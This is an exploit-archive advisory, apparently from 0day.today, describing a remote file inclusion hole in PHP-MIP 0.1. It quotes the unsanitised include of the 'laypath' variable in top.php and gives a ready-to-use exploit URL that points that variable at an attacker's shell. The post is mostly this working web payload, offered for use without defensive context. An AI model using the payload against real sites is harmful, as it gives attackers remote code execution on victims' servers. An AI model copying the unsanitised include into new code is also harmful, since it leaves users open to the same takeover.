id: 1542
date: 02/25/2007
title: PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability
author: GoLd_M
cves: 

===============================================================
PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability
===============================================================



*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul   ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/               ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali]  &&  Contact: HackEr_@W.Cn           ^
**********************************************************************
**********************************************************************
In:  /[path]/top.php                                                ^
**********************************************************************
**********************************************************************
Vulnerable Code:                                                    ^
**********************************************************************
**********************************************************************
include("$laypath/body.php");    Line : 23                          ^
**********************************************************************
**********************************************************************
Exploit:                                                            ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell]                           ^
**********************************************************************
**********************************************************************




#  0day.today [2023-03-25]  #